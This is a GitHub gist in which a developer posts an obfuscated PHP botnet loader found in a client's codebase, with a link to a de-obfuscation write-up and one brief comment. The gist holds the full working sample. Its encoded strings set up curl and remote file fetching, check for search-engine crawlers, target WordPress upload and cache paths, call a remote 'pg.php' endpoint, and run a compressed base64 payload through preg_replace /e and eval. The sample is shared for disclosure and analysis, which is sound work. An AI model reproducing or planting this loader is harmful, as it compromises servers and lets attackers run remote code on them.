Create a gist now

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Found this botnet code in a client's codebase. Cleaned it up, then went about de-obfuscating it to figure out what it was doing. http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
<?php
/*versio:2.18*/$QQOO=0;if (!function_exists('Q0QQOOQO')){$GLOBALS['QQOO'] = 'hY3VybAX2luaXQ)W*YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLw TJndheT1maWxlX2dldF9jb250ZW50cw{aX3NldG9wdAHX2V4ZWMSaC~ujJndheT1jdXJsikSMnDCLwfpb3Nvbi5pbglYS1pbi1hLWNpcmNsZS5jb20.rYcGhwYWlkZS5jb20!dwJWV8DES~&OgGY{ZGlzcGxheV9lcnJvcnM*ZGV0ZXJtaW5hdG9yZnRwMTM.Mi4xOA~NUVFRT1EwT1EwT09RT1FPYmFzZTY0X2RlY29kZQRGYmFzZTY0X2VuY29kZQuSFRUUF9IT1NUdW5pb24XOO@b!c2VsZWN0MmUkVRVUVTVF9VUkkduVU0NSSVBUX05BTUUELQUVVFUllfU1RSSU5HPwq&dL3RtcC8uZm9udC11bml4kuzVE1QI VEVNUAVE1QRElSfCHC)dG1wd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQqdXBsb2FkX3RtcF9kaXIBXL3RtcAR@ LgJdmVyc2lvOLQnyLXBocAzPrjyLSFRUUF9FWEVDUEhQVvYb3V0kMUb2s=yLSFRUUF9VU0VSX0FHRU5UiqLAHRZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgIk$L3BnLnBocD91PQJms9JnQ9cGhwJnA9JnY9EZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlY0MXZvbGdRLzFkZVRkTkE0bklnNHNmMXVHaTY5a3JTazJwMWswM1hFRmVmTFZrRUEzamRwdkYvdjVsNUQzaFcycjJyVGNRMzgrWjdmak9FRzZhZHJma21qUGxhYTZ4NXp0TnRHQy96SkczbytpdmI3T05WSGlZeFV5bkJoaWNiN2R5eklpdnltdXppM0tOSDVyTHgvUFpXWjYrc090bUdxelRKd3kzWDhuVFA5VXVXOG55Znhrd1ZBYWVIU3RNanp6ZGh4SUVJTkF2a24wLzhDZnlCTmZCa3dqK0luWmlUaWU5UGZNMXFzZzdjSng1ekFoVEpZNVFjM1NickFzY2dqTU1nNDdsV1hRVkt5OVNiekFKeUNIRWdsc2NhRnAyNWlrb2JEM1hoSnRwdnVRTTBHRzhHcXlUT2VaeG5sUWk3RHdwTW5SbE1Pb1JQd2lPamt1bUFIellvS3VNalJXTmtlSlJ4TksrSVVNQi9oaG1va0Q3cklqRHdoSUVaeUZNTmcrSkZrUmQ1ZFVIcDJXUVY4WGhvVkExUHZ5MGpKK1ZvVWt1VFhjMm50LzdkTElDdkp2dWZubG9taE05cTZSOEt2aGtOUDQrbXpjMFNYUCtRY1RxYXphZmoyWFE0dnIrR0M3TEczdWUvOHNmajBkVnM1djA5OHVlekpuTkU3WUNSUGdWUFJLTzRoNkpXK3pRS1ZsR1NjZVVVMDhHM3UveEZrNWNoQ1pXWXl0Y1doQm40RDJWV0JVK1IxYktFTVA2RFRaYXNmaVE3SGxlbDN6T3AvSDNUeHdmUFE3ZUUwV2hCMFQ0b0JuSnVtclhLMlhGN2drdWIzUjdMcCtqZnhsK2pHWHVWbVRwY1BDOWZYTFNFNSt4bU5ydjd6VExNYittMytDYko4dCtCVFpoMndLTUdCUThWWStQZDNkd0YvcjJoNk85Z254aDQvbVUwdmZmOGNZM3VlY2JUVDhOSDZCa1VMb1NSOEVMQjh4T0N3ZGtIK0NQOTA5bkZCZFBlNEEzN1ZKSC9BR3VxU0JrWWNXaFp4UmlyMVNNb0dteGt2a3Q0QWhreVMvem5Ma3JXWEd1VU5qWUxrY0MzanhGaEpQZUR1YWo2T2R6VzNCTjhwQk0vK0RzaUxjTTBYYjRvTUdTYjFGcEtzMWx0UUl5V2ZYVFV3YzV5c0xOS01IMU93NXdjc2FCNG12QU5Ma1VRQlZFK29NMktBTDFrMFFtbVNoNkNCRFFxc0E4MmhTQzZVZ3E2VkdKRkZPbExxVC9aNTVCd2pmb3Fza1F4UTZHQlNMNTZTaFRiZTFBc3RtNUlScVdLRUlXZ2l1UkZnK0xYb0N5ZEFub2ZFYWl2aTdJWFE2Mml0aXlrZGlUZVk3bjd2dTlXWk5zUmNFZU40SnNLcFczTElZUFk0SGtLQldHN1JUMkd3T0JQRkZJWFNGYXZST0ZJSWZVVkVqYVQreFpDUzRyaFpubWFKMUh5ekZOdGNCN2NqNmJRU2c4VnYyVVNtR0toYlpLVUwxZFBrTmNBRzNxWk1SbE05ODhxNnBoM0VMbExNazBlVnZtMld5Mk1BRUlaU25pUTF4ZHVEWjRWTStsZFdSak4zbitUZFFDcnRMTXdvOVk1ZGJIdFVGVXZ4TVI5bjA3NGZVcnUySUtNa0ZrYndwNUZaYkg0bFhoRFhRSDZ0QVBBZ1B0SW91Z0ZhclVKRlpWYnBMWHVWdWtuWWhRQS9zUjBCOXUxVXd3RFE5YWxJWEZXRnFNYzRZQWM3anBNNHlVQVh4QmNlN2VqSU5DTno5NFVocDAvL1FyYTdvYlRJVHpLeWpmTkVtVXFyOXBtUzI1RU5mYTFXMkJmVzEvVUUyM2F3d1J4TlA3eXpyVmpDdTVSdlhwS0lVMjZWc0ZCMnpGUlhDMEZnYUtlMU8wQnFZVituV3g0am1rUlpxaEE2bUFqSUZBY2RaVU1HL1VWSXFVbDIrbE1MZ0x5VUg4dDZJWmJHMyt4YVdZQkl1cnllOFNQYjVMcHVJMkp3MHYySGZUL0tDZEV2dDI1Si80NUdDL0NTQ29icWFMTVVnUEhlUEExR001bk40MkY2MHEyQW9NTFJCMUlyRmJFdGpGQnpRSVJGWVZ0dXdCbEJGR1YwTVhJbGZ0SmhFUEJsZUJZMTMyTzA1ZmRoMU9HLzdPTWlsc2c0eGZtWVZiYlIzbnJPVGhFYUFiQmpweHJKajBXQVJkdkZSQkIwcFVuKzlXVCtFa3ZCNnRvditaQkVxOTRjU2hRampZR2F0NEJiSUk4WHVFVWwwZmwvb3daRzN3TTFVNWZ6SW9qcUM2MmlaS3JZMUZrRmFjNitBN2l3RlNueXB2UStSc2dGeVkwUytxWjYxN1Q1aXpZVkZmbHV3TDhxYXRpcDR2WTA4YUVrbDlWUWp1OVBnYTVLQzJGMExkcDhweldRTmQwNUJXcW1rdXh0MW9XS0t4ZTdXalJnUVdwZXJ1N2ZKT1N3M0hsdytkZk5Bb0pIZz09IikpKTsscHJlZ19yZXBsYWNlRj';function Q0QQOOQO($a, $b){$c=$GLOBALS['QQOO']; $d=pack('H*','626173'.'6536345f6465636f6465'); return $d(substr($c, $a, $b));};$Ill11I1lI = Q0QQOOQO(3274, 16);$Ill11I1lI("/II1l1IIIl/e", Q0QQOOQO(710, 2563), "II1l1IIIl");};
?>
@jperl

This comment has been minimized.

Show comment
Hide comment
@jperl

jperl Apr 21, 2013

Wow this is interesting

jperl commented Apr 21, 2013

Wow this is interesting

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment